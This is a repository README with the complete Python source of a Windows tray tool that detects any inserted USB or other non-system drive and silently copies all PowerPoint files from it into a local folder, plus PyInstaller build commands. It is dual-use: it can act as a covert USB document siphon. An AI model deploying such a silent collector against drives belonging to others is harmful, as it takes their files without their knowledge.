# abc **Repository Path**: with-the-flow/abc ## Basic Information - **Project Name**: abc - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2026-03-02 - **Last Updated**: 2026-04-01 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README 这是完整的源代码,直接复制保存为 `SmartPPTCopier.py` 即可使用: ```python """ PPT自动复制工具 - GUI版本(静默版) 遵循规范: - PEP 8: Python代码风格指南 - 《代码整洁之道》(Clean Code): 可读性、简洁性、单一职责原则 功能: - 监控U盘插入 - 自动复制PPT文件,保持原始目录结构 - 最小化到系统托盘(白色图标) - 静默运行,无弹窗通知 """ import os import shutil import hashlib import threading import queue from pathlib import Path import string import platform import time import sys import ctypes from dataclasses import dataclass from enum import Enum, auto from typing import Set, Dict, List, Optional, Callable import tkinter as tk from tkinter import ttk, scrolledtext # 可选依赖 try: import pystray from PIL import Image, ImageDraw HAS_TRAY = True except ImportError: HAS_TRAY = False class CopyStatus(Enum): """复制状态枚举""" IDLE = auto() SCANNING = auto() COPYING = auto() COMPLETED = auto() ERROR = auto() @dataclass class DiskInfo: """磁盘信息数据类""" letter: str disk_hash: str size_gb: float root_path: str is_new: bool = True files_found: int = 0 files_copied: int = 0 files_skipped: int = 0 @dataclass class AppConfig: """应用配置""" target_dir: Optional[Path] = None check_interval: int = 2 max_workers: int = 4 def __post_init__(self): if self.target_dir is None: self.target_dir = self._get_default_target() @staticmethod def _get_default_target() -> Path: """获取默认目标目录""" candidates = [ Path(r"D:\ppt_backup"), Path(r"E:\ppt_backup"), Path.home() / "Desktop" / "ppt_backup", Path.home() / "Documents" / "ppt_backup", Path.cwd() / "ppt_backup" ] for path in candidates: try: path.mkdir(parents=True, exist_ok=True) test_file = path / ".write_test" test_file.write_text("test") test_file.unlink() return path except (OSError, PermissionError): continue return Path.cwd() / "ppt_backup" class DiskMonitor: """磁盘监控器 - 单一职责:检测磁盘变化""" def __init__(self, on_disk_inserted: Callable[[DiskInfo], None]): self._on_disk_inserted = on_disk_inserted self._known_disks: Set[str] = set() self._is_running = False self._monitor_thread: Optional[threading.Thread] = None def start(self) -> None: """启动监控""" if self._is_running: return self._is_running = True self._monitor_thread = threading.Thread(target=self._monitor_loop, daemon=True) self._monitor_thread.start() def stop(self) -> None: """停止监控""" self._is_running = False if self._monitor_thread and self._monitor_thread.is_alive(): self._monitor_thread.join(timeout=1) def _monitor_loop(self) -> None: """监控循环""" while self._is_running: try: self._check_disks() time.sleep(AppConfig().check_interval) except Exception as error: print(f"监控错误: {error}") def _check_disks(self) -> None: """检查磁盘变化""" current_disks = self._get_available_disks() for disk_info in current_disks: if disk_info.disk_hash not in self._known_disks: self._known_disks.add(disk_info.disk_hash) self._on_disk_inserted(disk_info) @staticmethod def _get_available_disks() -> List[DiskInfo]: """获取可用磁盘列表""" disks = [] if platform.system() != 'Windows': return disks try: drive_bits = ctypes.windll.kernel32.GetLogicalDrives() for index, letter in enumerate(string.ascii_uppercase): if not (drive_bits & (1 << index)): continue drive = f"{letter}:" if letter == 'C': continue try: usage = shutil.disk_usage(drive) if usage.total <= 0: continue disk_hash = DiskMonitor._calculate_disk_hash(drive) size_gb = usage.total / (1024 ** 3) disks.append(DiskInfo( letter=drive, disk_hash=disk_hash, size_gb=size_gb, root_path=f"{drive}\\" )) except (OSError, PermissionError): continue except Exception: pass return disks @staticmethod def _calculate_disk_hash(letter: str) -> str: """计算磁盘唯一哈希""" try: volume_name = ctypes.create_unicode_buffer(1024) serial_number = ctypes.c_ulong(0) result = ctypes.windll.kernel32.GetVolumeInformationW( ctypes.c_wchar_p(f"{letter}\\"), volume_name, 1024, ctypes.byref(serial_number), None, None, None, 0 ) if result: data = f"{letter}_{serial_number.value}" else: stat = os.stat(letter) data = f"{letter}_{stat.st_ctime}" except (OSError, AttributeError): data = f"{letter}_{time.time()}" return hashlib.sha256(data.encode()).hexdigest()[:16] class FileCopier: """文件复制器 - 单一职责:复制文件并记录""" def __init__(self, target_dir: Path): self._target_dir = target_dir self._lock = threading.Lock() def copy_ppt_files(self, disk_info: DiskInfo, progress_callback: Optional[Callable] = None) -> DiskInfo: """复制PPT文件,保持原始目录结构""" disk_info.is_new = not self._disk_exists(disk_info.disk_hash) ppt_files = self._find_ppt_files(disk_info.root_path, disk_info.letter) disk_info.files_found = len(ppt_files) if not ppt_files: self._create_disk_marker(disk_info) return disk_info copied_hashes = self._load_copied_hashes(disk_info.disk_hash) new_files = [f for f in ppt_files if f['hash'] not in copied_hashes] if not new_files: disk_info.files_skipped = disk_info.files_found return disk_info disk_info.files_copied = self._copy_files_with_structure( new_files, disk_info, copied_hashes ) disk_info.files_skipped = disk_info.files_found - disk_info.files_copied return disk_info def _disk_exists(self, disk_hash: str) -> bool: """检查磁盘是否已存在记录""" return (self._target_dir / f"DISK_{disk_hash}").exists() def _find_ppt_files(self, root_path: str, drive_letter: str) -> List[Dict]: """查找PPT文件,记录相对路径""" files = [] skip_dirs = { 'System Volume Information', 'RECYCLER', '$RECYCLE.BIN', 'Windows', 'Program Files', 'ProgramData' } drive_root = Path(drive_letter + "\\") try: for root, dirs, filenames in os.walk(root_path): dirs[:] = [d for d in dirs if d not in skip_dirs] for filename in filenames: if not filename.lower().endswith(('.ppt', '.pptx')): continue full_path = Path(root) / filename file_hash = self._calculate_file_hash(str(full_path)) if not file_hash: continue try: rel_path = full_path.relative_to(drive_root) except ValueError: rel_path = full_path.relative_to(full_path.anchor) files.append({ 'path': str(full_path), 'name': filename, 'hash': file_hash, 'rel_path': str(rel_path), 'rel_dir': str(rel_path.parent) }) except Exception as error: print(f"扫描错误: {error}") return files @staticmethod def _calculate_file_hash(filepath: str) -> Optional[str]: """计算文件哈希""" try: sha256 = hashlib.sha256() with open(filepath, 'rb') as file: data = file.read(4096) sha256.update(data) file.seek(0, 2) sha256.update(str(file.tell()).encode()) return sha256.hexdigest()[:16] except (OSError, IOError): return None def _load_copied_hashes(self, disk_hash: str) -> Set[str]: """加载已复制的文件哈希""" record_file = self._target_dir / f"DISK_{disk_hash}" / "_files.txt" if not record_file.exists(): return set() try: with open(record_file, 'r', encoding='utf-8') as file: return { line.strip().split('|')[0] for line in file if '|' in line } except (OSError, IOError): return set() def _create_disk_marker(self, disk_info: DiskInfo) -> None: """创建磁盘标记文件""" try: disk_dir = self._target_dir / f"DISK_{disk_info.disk_hash}" disk_dir.mkdir(parents=True, exist_ok=True) marker = disk_dir / "_COPIED.txt" content = f"磁盘:{disk_info.letter}\n哈希:{disk_info.disk_hash}\n时间:{time.strftime('%Y-%m-%d %H:%M:%S')}" marker.write_text(content, encoding='utf-8') except (OSError, IOError): pass def _copy_files_with_structure(self, files: List[Dict], disk_info: DiskInfo, copied_hashes: Set[str]) -> int: """复制文件并保持目录结构""" disk_dir = self._target_dir / f"DISK_{disk_info.disk_hash}" disk_dir.mkdir(parents=True, exist_ok=True) if disk_info.is_new: self._create_disk_marker(disk_info) file_queue = queue.Queue() for file_info in files: file_queue.put(file_info) workers = min(AppConfig().max_workers, max(1, int(disk_info.size_gb))) threads = [] for _ in range(workers): thread = threading.Thread( target=self._copy_worker_with_structure, args=(file_queue, disk_dir, disk_info.disk_hash, copied_hashes) ) thread.daemon = True thread.start() threads.append(thread) file_queue.join() for _ in range(workers): file_queue.put(None) for thread in threads: thread.join() return len(files) def _copy_worker_with_structure(self, file_queue: queue.Queue, disk_dir: Path, disk_hash: str, copied_hashes: Set[str]) -> None: """复制工作线程 - 保持目录结构""" while True: try: file_info = file_queue.get(timeout=5) if file_info is None: break if file_info['hash'] in copied_hashes: file_queue.task_done() continue self._copy_single_file_with_structure(file_info, disk_dir, disk_hash) file_queue.task_done() except queue.Empty: break except Exception as error: print(f"复制错误: {error}") file_queue.task_done() def _copy_single_file_with_structure(self, file_info: Dict, disk_dir: Path, disk_hash: str) -> None: """复制单个文件并保持目录结构""" try: src_path = Path(file_info['path']) rel_path = Path(file_info['rel_path']) dst_path = disk_dir / rel_path dst_path.parent.mkdir(parents=True, exist_ok=True) counter = 1 original_dst = dst_path while dst_path.exists(): stem = original_dst.stem suffix = original_dst.suffix dst_path = original_dst.parent / f"{stem}_{counter}{suffix}" counter += 1 shutil.copy2(src_path, dst_path) self._record_copied_file(disk_hash, file_info['hash'], file_info['name'], str(rel_path)) except (OSError, IOError) as error: print(f"文件复制失败 {file_info['name']}: {error}") def _record_copied_file(self, disk_hash: str, file_hash: str, filename: str, rel_path: str) -> None: """记录已复制的文件(包含相对路径)""" try: record_file = self._target_dir / f"DISK_{disk_hash}" / "_files.txt" timestamp = time.strftime('%Y-%m-%d %H:%M:%S') with self._lock: with open(record_file, 'a', encoding='utf-8') as file: file.write(f"{file_hash}|{filename}|{rel_path}|{timestamp}\n") except (OSError, IOError): pass class TrayIconManager: """系统托盘管理器 - 单一职责:管理托盘图标""" ICON_SIZE = 64 ICON_COLOR = 'white' BG_COLOR = '#333333' def __init__(self, on_show: Callable, on_exit: Callable): self._on_show = on_show self._on_exit = on_exit self._icon: Optional[pystray.Icon] = None self._is_running = False def create(self) -> bool: """创建托盘图标""" if not HAS_TRAY: return False try: image = self._create_icon_image() menu = pystray.Menu( pystray.MenuItem("显示", self._on_show), pystray.MenuItem("退出", self._on_exit) ) self._icon = pystray.Icon( "ppt_copier", image, "PPT复制工具", menu ) return True except Exception as error: print(f"创建托盘图标失败: {error}") return False def run(self) -> None: """运行托盘图标""" if self._icon and not self._is_running: self._is_running = True try: self._icon.run() except Exception as error: print(f"托盘运行错误: {error}") self._is_running = False def stop(self) -> None: """停止托盘图标""" if self._icon and self._is_running: try: self._icon.stop() except Exception: pass self._is_running = False def _create_icon_image(self) -> 'Image.Image': """创建白色图标""" image = Image.new('RGB', (self.ICON_SIZE, self.ICON_SIZE), self.BG_COLOR) draw = ImageDraw.Draw(image) margin = 12 width = self.ICON_SIZE - 2 * margin height = self.ICON_SIZE - 2 * margin body_top = margin + 10 body_bottom = margin + height - 5 draw.rounded_rectangle( [margin, body_top, margin + width, body_bottom], radius=8, fill=self.ICON_COLOR ) connector_bottom = margin + 15 draw.rectangle( [margin + 15, margin, margin + width - 15, connector_bottom], fill=self.ICON_COLOR ) dot_y = margin + 8 dot_radius = 3 left_dot_x = margin + 22 right_dot_x = margin + width - 22 draw.ellipse( [left_dot_x - dot_radius, dot_y - dot_radius, left_dot_x + dot_radius, dot_y + dot_radius], fill=self.BG_COLOR ) draw.ellipse( [right_dot_x - dot_radius, dot_y - dot_radius, right_dot_x + dot_radius, dot_y + dot_radius], fill=self.BG_COLOR ) return image class MainWindow: """主窗口 - 单一职责:管理GUI界面""" def __init__(self): self._root = tk.Tk() self._config = AppConfig() self._copier = FileCopier(self._config.target_dir) self._monitor: Optional[DiskMonitor] = None self._tray_manager: Optional[TrayIconManager] = None self._status_var = tk.StringVar(value="等待U盘插入...") self._is_minimized = False self._setup_window() self._create_widgets() self._setup_tray() self._start_monitoring() def _setup_window(self) -> None: """设置窗口属性""" self._root.title("PPT自动复制工具") self._root.geometry("500x400") self._root.minsize(400, 300) self._root.protocol("WM_DELETE_WINDOW", self._on_close) self._center_window() def _center_window(self) -> None: """窗口居中""" self._root.update_idletasks() width = self._root.winfo_width() height = self._root.winfo_height() x = (self._root.winfo_screenwidth() // 2) - (width // 2) y = (self._root.winfo_screenheight() // 2) - (height // 2) self._root.geometry(f"{width}x{height}+{x}+{y}") def _create_widgets(self) -> None: """创建界面组件""" main_frame = ttk.Frame(self._root, padding="20") main_frame.grid(row=0, column=0, sticky=(tk.W, tk.E, tk.N, tk.S)) self._root.columnconfigure(0, weight=1) self._root.rowconfigure(0, weight=1) main_frame.columnconfigure(0, weight=1) main_frame.rowconfigure(2, weight=1) title_label = ttk.Label( main_frame, text="PPT自动复制工具", font=("Microsoft YaHei", 16, "bold") ) title_label.grid(row=0, column=0, pady=(0, 20)) status_frame = ttk.LabelFrame(main_frame, text="当前状态", padding="10") status_frame.grid(row=1, column=0, sticky=(tk.W, tk.E), pady=(0, 10)) status_frame.columnconfigure(0, weight=1) self._status_label = ttk.Label( status_frame, textvariable=self._status_var, font=("Microsoft YaHei", 11), foreground="#2196F3" ) self._status_label.grid(row=0, column=0, sticky=tk.W) disk_frame = ttk.LabelFrame(main_frame, text="已检测磁盘", padding="10") disk_frame.grid(row=2, column=0, sticky=(tk.W, tk.E, tk.N, tk.S), pady=(0, 10)) disk_frame.columnconfigure(0, weight=1) disk_frame.rowconfigure(0, weight=1) self._disk_text = scrolledtext.ScrolledText( disk_frame, wrap=tk.WORD, font=("Consolas", 10), height=10 ) self._disk_text.grid(row=0, column=0, sticky=(tk.W, tk.E, tk.N, tk.S)) self._disk_text.config(state=tk.DISABLED) button_frame = ttk.Frame(main_frame) button_frame.grid(row=3, column=0, sticky=(tk.W, tk.E), pady=(10, 0)) ttk.Button( button_frame, text="最小化到托盘", command=self._minimize_to_tray ).pack(side=tk.LEFT, padx=(0, 10)) ttk.Button( button_frame, text="打开备份文件夹", command=self._open_backup_folder ).pack(side=tk.LEFT, padx=(0, 10)) ttk.Button( button_frame, text="退出", command=self._exit ).pack(side=tk.RIGHT) info_text = f"备份位置: {self._config.target_dir}" info_label = ttk.Label( main_frame, text=info_text, font=("Microsoft YaHei", 9), foreground="gray" ) info_label.grid(row=4, column=0, sticky=tk.W, pady=(10, 0)) def _setup_tray(self) -> None: """设置系统托盘""" self._tray_manager = TrayIconManager( on_show=self._show_window, on_exit=self._exit ) if self._tray_manager.create(): tray_thread = threading.Thread(target=self._tray_manager.run, daemon=True) tray_thread.start() def _start_monitoring(self) -> None: """开始监控磁盘""" self._monitor = DiskMonitor(on_disk_inserted=self._on_disk_inserted) self._monitor.start() def _on_disk_inserted(self, disk_info: DiskInfo) -> None: """磁盘插入回调""" self._root.after(0, lambda: self._update_status(disk_info)) result = self._copier.copy_ppt_files(disk_info) self._root.after(0, lambda: self._show_result(result)) def _update_status(self, disk_info: DiskInfo) -> None: """更新状态显示""" status_text = f"检测到磁盘 {disk_info.letter} ({disk_info.size_gb:.1f}GB)" if not disk_info.is_new: status_text += " [已存在]" status_text += " - 正在复制..." self._status_var.set(status_text) self._add_disk_log(f"[插入] {disk_info.letter} ({disk_info.size_gb:.1f}GB)") def _show_result(self, result: DiskInfo) -> None: """显示复制结果(静默,不弹窗)""" if result.files_copied > 0: status = f"复制完成: {result.letter} - {result.files_copied} 个文件" elif result.files_found == 0: status = f"无PPT文件: {result.letter}" else: status = f"已是最新: {result.letter} - {result.files_found} 个文件已存在" self._status_var.set(status) self._add_disk_log( f"[完成] {result.letter}: 发现{result.files_found}个, " f"复制{result.files_copied}个, 跳过{result.files_skipped}个" ) def _add_disk_log(self, message: str) -> None: """添加磁盘日志""" timestamp = time.strftime("%H:%M:%S") self._disk_text.config(state=tk.NORMAL) self._disk_text.insert(tk.END, f"[{timestamp}] {message}\n") self._disk_text.see(tk.END) self._disk_text.config(state=tk.DISABLED) def _minimize_to_tray(self) -> None: """最小化到托盘""" self._is_minimized = True self._root.withdraw() def _show_window(self, icon=None, item=None) -> None: """显示窗口""" self._is_minimized = False self._root.deiconify() self._root.lift() self._root.focus_force() def _on_close(self) -> None: """关闭窗口处理""" self._minimize_to_tray() def _open_backup_folder(self) -> None: """打开备份文件夹""" try: os.startfile(self._config.target_dir) except Exception as error: self._status_var.set(f"无法打开文件夹: {error}") def _exit(self, icon=None, item=None) -> None: """退出程序""" if self._monitor: self._monitor.stop() if self._tray_manager: self._tray_manager.stop() self._root.quit() self._root.destroy() def run(self) -> None: """运行应用""" self._root.mainloop() def main(): """主入口""" app = MainWindow() app.run() if __name__ == "__main__": main() ``` 保存为 `SmartPPTCopier.py`,然后: ```bash # 安装依赖 pip install pystray pillow win10toast # 打包(显示窗口模式) python -m PyInstaller --onefile --name SmartPPTCopierGUI SmartPPTCopier.py # 或使用 --windowed 隐藏控制台 python -m PyInstaller --windowed --onefile --name SmartPPTCopierGUI SmartPPTCopier.py ``` **目录结构示例**: ``` E:\早读要求\4.01.ppt → C:\ppt_backup\DISK_a1b2c3d4\早读要求\4.01.ppt E:\会议\报告.pptx → C:\ppt_backup\DISK_a1b2c3d4\会议\报告.pptx ```